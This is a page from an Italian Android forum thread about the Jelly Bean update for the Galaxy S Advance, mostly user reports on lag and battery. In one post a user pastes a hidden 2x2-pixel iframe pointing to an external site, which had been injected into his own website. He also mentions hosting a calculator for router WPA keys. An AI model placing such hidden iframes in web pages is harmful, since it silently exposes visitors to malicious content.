CERCA
PER MODELLO
FullScreen Chatbox! :)

Utente del giorno: complicazio con ben 2 Thanks ricevuti nelle ultime 24 ore
Utente della settimana: 9mm con ben 11 Thanks ricevuti negli ultimi sette giorni
Utente del mese: 9mm con ben 34 Thanks ricevuti nell'ultimo mese

Pagina 117 di 818 primaprima ... 1767107115116117118119127167217617 ... ultimoultimo
Ultima pagina
Visualizzazione dei risultati da 1,161 a 1,170 su 8173
Discussione:

[DISCUSSIONE] update JB per i9070 (non P) ##OBSOLETA##

Se questa discussione ti è stata utile, ti preghiamo di lasciare un messaggio di feedback in modo che possa essere preziosa in futuro anche per altri utenti come te!
  1. #1161
    Senior Droid L'avatar di Giammy9


    Registrato dal
    Mar 2012
    Messaggi
    823

    Ringraziamenti
    402
    Ringraziato 52 volte in 45 Posts
    Predefinito

    Quote Originariamente inviato da iakopo87 Visualizza il messaggio
    Eh se nn li trovi allora vuol dire che nn sono compatibili.. Questo telefono nn è proprio considerato dagli sviluppatori di giochi.. Eppure come hardware nn è così male..

    Inviato dal mio GT-I9070P
    bho ma ho dato un occhiata veloce al play store, però ho visto shadowgun dead zone
    Phone: Samsung Galaxy S Advance GT-i9070 Stock 4.1.2

  2.  
  3. #1162
    Androidiano


    Registrato dal
    Apr 2012
    Messaggi
    61

    Ringraziamenti
    0
    Ringraziato 3 volte in 3 Posts
    Predefinito

    Rragazzi a me aprendo le ultime pagine di questo topic mi viene fuori sta pagina


    cmq, nessun'altro sa darmi consigli sulla batteria?
    ringrazio iceberg per i consigli, ora metto il cellulare in modalità offline, e domani posto uno screen dei consumi batteria
    Ultima modifica di dergusbio; 11-01-13 alle 02:42

  4. #1163
    Banned


    Registrato dal
    Feb 2011
    Messaggi
    310

    Ringraziamenti
    35
    Ringraziato 17 volte in 11 Posts
    Predefinito

    Quote Originariamente inviato da dergusbio Visualizza il messaggio
    Rragazzi a me aprendo le ultime pagine di questo topic mi viene fuori sta pagina


    cmq, nessun'altro sa darmi consigli sulla batteria?
    ringrazio iceberg per i consigli, ora metto il cellulare in modalità offline, e domani posto uno screen dei consumi batteria
    e ma no basta che palle google ha rotto adesso..... mi segnala il sito perchè la pagina php del calcolo delle wpa alice viene vista come malware, cavolata perchè non lo è ed è pure disponibile per il download....

    EDIT:

    Scherzavo, mi hanno aggiunto codice alla index O.o
    <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dev.namebadgesupply.com/zmci.html?i=1037603></iframe></body>
    Edit:
    Sito ripulito... richiesto controllo a google.. vediamo...
    Ultima modifica di InsaneKiller; 11-01-13 alle 03:37

  5. #1164
    Senior Droid


    Registrato dal
    Dec 2012
    Messaggi
    651

    Ringraziamenti
    0
    Ringraziato 25 volte in 23 Posts
    Predefinito

    Quote Originariamente inviato da minar Visualizza il messaggio
    Tra i commenti su sammobile e su altri forum é pieno di gente che lamenta scarsa fluidità blocchi lag e bug.. Sono loro ubriachi o noi fortunati? A vedere dai filmati e dalle impressioni qui su androidiani é tutt altro che scattoso c é anche gente che vuole ritornare a gingerbread, Mha.. Lo verificherà entro il fine settimana...


    Inviato dal mio galaxy s advance in attesa di flash
    o dio non è che sia il massimo della fluidità esita un po' nell'aprire le applicazioni come detto prima per avviare una chiamata la tastiera numerica o la rubrica impiega circa 4 sec ad aprirsi (questo quando sta circa 10 min in latenza) ieri ho provato con ginger del mio amico e ginger è molto più reattivo e scattante non so che dire sarà per il fatto della memoria ram che lavora sempre a limite, speriamo che risolvano con qualche aggiornamento o con quella italiana

  6. #1165
    Senior Droid


    Registrato dal
    Mar 2012
    Messaggi
    460

    Ringraziamenti
    16
    Ringraziato 100 volte in 86 Posts
    Predefinito

    Quote Originariamente inviato da minar Visualizza il messaggio
    Tra i commenti su sammobile e su altri forum é pieno di gente che lamenta scarsa fluidità blocchi lag e bug.. Sono loro ubriachi o noi fortunati?
    Ogni situazione come al solito e' storia a se.
    Poi sai non si puo' giudicare una cosa appena installata , tra l'altro giustamente dopo un reset di fabbrica e pulizia delle cache il sistema diventa una scheggia anche con gingerbread
    Comincia a caricarci applicazioni , usarne parecchie insieme ... la ram disponibile per le applicazioni e' aumentata ma anche quella occupata in partenza e' maggiore di prima.
    Gia' qualcuno se leggi nei post indietro comincia a trovare qualche ritardo/impuntamento ...
    Io ce l'ho da un paio di giorni e quello che posso dire , rispetto alla fluidita' lag etc . che miracoli non me li aspettavo e miracoli non ci sono stati.

    Poi carino e' carino e non e' che mi lamenti
    Galaxy S SCL I9003 Stock Ita Gingerbread 2.3.6 XWLF2 + XWLF2_CFROOT
    Galaxy S Advance I9070 Jelly Bean Italia 4.1.2 XXLQG + Root + Kernel Cocore

  7. #1166
    Androidiani Power User L'avatar di dell


    Registrato dal
    Apr 2012
    Località
    Piuro
    Messaggi
    8,413
    Smartphone
    D5803, E960 & (il fu) i9001

    Ringraziamenti
    655
    Ringraziato 2,977 volte in 2,180 Posts
    Predefinito

    Quote Originariamente inviato da tacito Visualizza il messaggio
    Ogni situazione come al solito e' storia a se.
    Poi sai non si puo' giudicare una cosa appena installata , tra l'altro giustamente dopo un reset di fabbrica e pulizia delle cache il sistema diventa una scheggia anche con gingerbread
    Comincia a caricarci applicazioni , usarne parecchie insieme ... la ram disponibile per le applicazioni e' aumentata ma anche quella occupata in partenza e' maggiore di prima.
    Gia' qualcuno se leggi nei post indietro comincia a trovare qualche ritardo/impuntamento ...
    Io ce l'ho da un paio di giorni e quello che posso dire , rispetto alla fluidita' lag etc . che miracoli non me li aspettavo e miracoli non ci sono stati.

    Poi carino e' carino e non e' che mi lamenti
    JB ha comunque funzioni che gb si sogna, tipo notifiche espandibili, project butter ecc ecc
    (io ho jb ma non posso parlare delle prestazioni in quanto non ho il vostro telefono)

    Don't be a n00b, be a newbie!
    Inviato ascendendo con 7770 Tapatalk
    Don't be a n00b, be a newbie.

  8. #1167
    Senior Droid


    Registrato dal
    Mar 2012
    Messaggi
    460

    Ringraziamenti
    16
    Ringraziato 100 volte in 86 Posts
    Predefinito

    Quote Originariamente inviato da dell Visualizza il messaggio
    JB ha comunque funzioni che gb si sogna, tipo notifiche espandibili, project butter ecc ecc
    Sono daccordo
    Ma far diventare piu' smooth un software a questo punto "piu' pesante" su stesso hardware non e' cosa cosi' semplice.
    Poi rientra nella stessa logica XP vista 7 8 ... se no chi lo cambia piu' il PC ehehheh
    Galaxy S SCL I9003 Stock Ita Gingerbread 2.3.6 XWLF2 + XWLF2_CFROOT
    Galaxy S Advance I9070 Jelly Bean Italia 4.1.2 XXLQG + Root + Kernel Cocore

  9. #1168
    Androidiano


    Registrato dal
    Jan 2013
    Messaggi
    270

    Ringraziamenti
    8
    Ringraziato 17 volte in 17 Posts
    Predefinito

    in effetti è come quello che succedeva con s2 e s2 tim con nfc

  10. #1169
    Senior Droid


    Registrato dal
    Dec 2012
    Messaggi
    651

    Ringraziamenti
    0
    Ringraziato 25 volte in 23 Posts
    Predefinito

    secondo me avrà un bel pò di aggiornamenti questo JB in futuro, almeno me lo auguro, chissà magari JB in italia sta ritardando proprio per questi problemi riscontrati , speriamo lo migliorino uleteriormente

  11. #1170
    Androidiani Power User L'avatar di dell


    Registrato dal
    Apr 2012
    Località
    Piuro
    Messaggi
    8,413
    Smartphone
    D5803, E960 & (il fu) i9001

    Ringraziamenti
    655
    Ringraziato 2,977 volte in 2,180 Posts
    Predefinito

    Facessero modifiche al fw poi ci sarebbero settimane di test

    Don't be a n00b, be a newbie!
    Inviato ascendendo con 7770 Tapatalk
    Don't be a n00b, be a newbie.

Pagina 117 di 818 primaprima ... 1767107115116117118119127167217617 ... ultimoultimo
Ultima pagina

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire risposte
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Torna su
Privacy Policy